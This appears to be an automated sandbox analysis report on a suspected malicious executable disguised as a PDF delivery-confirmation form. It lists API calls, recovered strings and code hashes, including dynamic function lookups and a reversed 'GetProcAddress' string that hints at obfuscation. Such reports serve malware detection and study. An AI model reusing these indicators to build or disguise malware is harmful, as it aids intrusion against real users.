                                                                  • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction Fuzzy Hash: 48D0A7AA30E2603AE320515B2D94D7B5AECCBC97B1F11843EF748C6200D210CC06D7F1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction ID: 7d08f828bf3d20ee24158828329d407b99343031302c4a2a8d73b857a9e1aba7
                                                                  • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction Fuzzy Hash: A6A01108808C20028A803B280C0223A3088A800A20FE80F82A8F8802E0EE2E0220A0E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4402f85698938614c49bf1d4620913970ec7e2e5c4b59d34d0443433b83ae5ff
                                                                  • Instruction ID: 023ededfea479b861fe0d2ad2fcf4830b12490774dbdac323ab4f80e9bc7c27c
                                                                  • Opcode Fuzzy Hash: 4402f85698938614c49bf1d4620913970ec7e2e5c4b59d34d0443433b83ae5ff
                                                                  • Instruction Fuzzy Hash: EBF1D56384D7C02BDB1317B10A773DA7FF99D03128B6B1ACEC9C64B467A54A058BDB06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02CDD225
                                                                    • Part of subcall function 02CDD1F0: GetProcAddress.KERNEL32(00000000), ref: 02CDD209
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                  • API String ID: 1646373207-1918263038
                                                                  • Opcode ID: 04d9a9651c2754aa40e5c784e60d7c83d03afb2299cffc802c32d1781ea51b09
                                                                  • Instruction ID: 7ddfb006a5668bae76002b3c8f338777dd4026e04f9b36a67b4981e7b2c8c79b
                                                                  • Opcode Fuzzy Hash: 04d9a9651c2754aa40e5c784e60d7c83d03afb2299cffc802c32d1781ea51b09
                                                                  • Instruction Fuzzy Hash: 0E41E9E7EC42465A9608AB7DFC015277BDAE788720360851BF60ACB745DE30FC519E2E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CE6E66
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CE6E77
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CE6E87
                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CE6E97
                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CE6EA7
                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CE6EB7
                                                                  • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02CE6EC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                  • API String ID: 667068680-2233174745
                                                                  • Opcode ID: e45ccde745bce8bb6a8af3fba4e3023074374b9009742bd914db7a1f95b51132
                                                                  • Instruction ID: 8e98df0db0b70358cdbfefa00304e85db47f77710d07059fd8440fb12d45079d
                                                                  • Opcode Fuzzy Hash: e45ccde745bce8bb6a8af3fba4e3023074374b9009742bd914db7a1f95b51132
                                                                  • Instruction Fuzzy Hash: 7FF0C0B4ADD351AEFB407F70FC81A2B375D95206043302A79B70356502DAB598129F59
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02CD28CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                  • API String ID: 2030045667-32948583
                                                                  • Opcode ID: 586666ed2d08b0a8076de26e9893dfb9a19789324d40c559ebda20ff25c3dcd9
                                                                  • Instruction ID: dcb475e5156da72cb228b4975a834e56a8bdf1e4b9ec8b9440fcd853cc599ae6
                                                                  • Opcode Fuzzy Hash: 586666ed2d08b0a8076de26e9893dfb9a19789324d40c559ebda20ff25c3dcd9
                                                                  • Instruction Fuzzy Hash: EFA1F370A043548BDB21AA2CCC80BD9B7E5EF49310F1440E5EE49AB387DB759AC6CF52
                                                                  Strings
                                                                  • Unexpected Memory Leak, xrefs: 02CD28C0
                                                                  • An unexpected memory leak has occurred. , xrefs: 02CD2690
                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CD2849
                                                                  • , xrefs: 02CD2814
                                                                  • 7, xrefs: 02CD26A1
                                                                  • bytes: , xrefs: 02CD275D
                                                                  • The unexpected small block leaks are:, xrefs: 02CD2707
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                  • API String ID: 0-2723507874
                                                                  • Opcode ID: 0b79d6bfe406fc7b3e37440c55cc68b4e508dfd43fc54c12c5d2a43a9b79aed1
                                                                  • Instruction ID: a940f1149c2c5a10dd9fd7b8f4176b5ff7c7ef4afda931faec28f4d2f4d9d3dd
                                                                  • Opcode Fuzzy Hash: 0b79d6bfe406fc7b3e37440c55cc68b4e508dfd43fc54c12c5d2a43a9b79aed1
                                                                  • Instruction Fuzzy Hash: 0671D570A042988FDB319A2CCC84BD9BBE5EF49704F1041E5DA49DB283DB758AC6CF52
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,02CDC013,?,?,00000000,00000000), ref: 02CDBD7E
                                                                    • Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: 74e23040175c6d228f3f527983e314ee845ad28035186af2f08c57351628781f
                                                                  • Instruction ID: ae909d3e06be57f80f67946b9cdc77bc82a6f7f7570b64cbe5d9506f7d0d9a77
                                                                  • Opcode Fuzzy Hash: 74e23040175c6d228f3f527983e314ee845ad28035186af2f08c57351628781f
                                                                  • Instruction Fuzzy Hash: C3614238B001489BDB05FBA4D89069FB7BB9F88300F91953AA301AB745DA35DE05EB94
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAE40
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CEAE57
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAEEB
                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02CEAEF7
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02CEAF0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Read$HandleModule
                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                  • API String ID: 2226866862-113032527
                                                                  • Opcode ID: 5c5410d90a752e7b8a9f1e65cab1e5af6612688f64507a8b1a2301048fcdf933
                                                                  • Instruction ID: a5f356cb00c35fcbfca13936ed8618a16904a19b11d1757a576de3c363daef9d
                                                                  • Opcode Fuzzy Hash: 5c5410d90a752e7b8a9f1e65cab1e5af6612688f64507a8b1a2301048fcdf933
                                                                  • Instruction Fuzzy Hash: 393192B2A00305BFDF20EF69CC85F5A77B8AF05324F104114FA56AB280D371E950DBA5
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8,?,?,02CFD7A8,02CD655D,02CFC30D), ref: 02CD4365
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8,?,?,02CFD7A8,02CD655D,02CFC30D), ref: 02CD436B
                                                                  • GetStdHandle.KERNEL32(000000F5,02CD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?,02D307C8), ref: 02CD4380
                                                                  • WriteFile.KERNEL32(00000000,000000F5,02CD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CD43F3,?,?), ref: 02CD4386
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02CD43A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: 3250f008afe5a9f95d219d6081b1c65c2030df2b34a34e0860f2bd5b4957dbff
                                                                  • Instruction ID: 1e3d4f78a7188ea30ba33a6c1bb1a51ca1c4b06c58df35717fec12e94cdb6aa3
                                                                  • Opcode Fuzzy Hash: 3250f008afe5a9f95d219d6081b1c65c2030df2b34a34e0860f2bd5b4957dbff
                                                                  • Instruction Fuzzy Hash: 8BF02461AC0340BAFB34B2A4AC46F69235C0B80F14F184A15F33AA81C587F0A4C8EB26
                                                                  APIs
                                                                    • Part of subcall function 02CDACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
                                                                    • Part of subcall function 02CDACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
                                                                    • Part of subcall function 02CDACC4: GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
                                                                    • Part of subcall function 02CDACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6
                                                                  • CharToOemA.USER32(?,?), ref: 02CDAE83
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEA0
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEA6
                                                                  • GetStdHandle.KERNEL32(000000F4,02CDAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEBB
                                                                  • WriteFile.KERNEL32(00000000,000000F4,02CDAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CDAEC1
                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02CDAEE3
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CDAEF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: 283b644d5c09a599097da78963d396d90ff19ce4cdea77e6ac0ea4af4554e9e5
                                                                  • Instruction ID: 6281f4a64986e5e4f42ab3d74a9b97f64b28ac049825503329b6bc29de631325
                                                                  • Opcode Fuzzy Hash: 283b644d5c09a599097da78963d396d90ff19ce4cdea77e6ac0ea4af4554e9e5
                                                                  • Instruction Fuzzy Hash: 391179B6598204BAD200FBA4EC80F9F77EEAB48700F51092AF354D61E1DA71E944DF62
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CDE5AD
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CDE5C9
                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02CDE602
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CDE67F
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02CDE698
                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02CDE6CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                  • String ID:
                                                                  • API String ID: 351091851-0
                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction ID: fa80110337c44346706958ab9f5b9b89b99dc17a99638f30382c8632e35798e7
                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction Fuzzy Hash: 9B51D776A0062D9BCB62EF58CC80BD9B3BDAF4D310F4045D5E609AB241D730AF859F61
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD358A
                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02CD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD35BD
                                                                  • RegCloseKey.ADVAPI32(?,02CD35E0,00000000,?,00000004,00000000,02CD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CD35D3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: aeb5f22db25f3e1f84c819c3fab1d8308e4c72cdf57a35414ed51f004fe3a6c0
                                                                  • Instruction ID: 5c4c3c1b171900de4751008526282e1d4f3aee4dd634a321bc45424089735131
                                                                  • Opcode Fuzzy Hash: aeb5f22db25f3e1f84c819c3fab1d8308e4c72cdf57a35414ed51f004fe3a6c0
                                                                  • Instruction Fuzzy Hash: 1A01B575A44248BAE711DB909D02BBD77ECE708710F1005A6BB05E7580F6759610DE59
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                  • API String ID: 667068680-1372893251
                                                                  • Opcode ID: ec25660e3807bf3243aa72f0974c8765ff6b752934edff3518f760832bbf4ca0
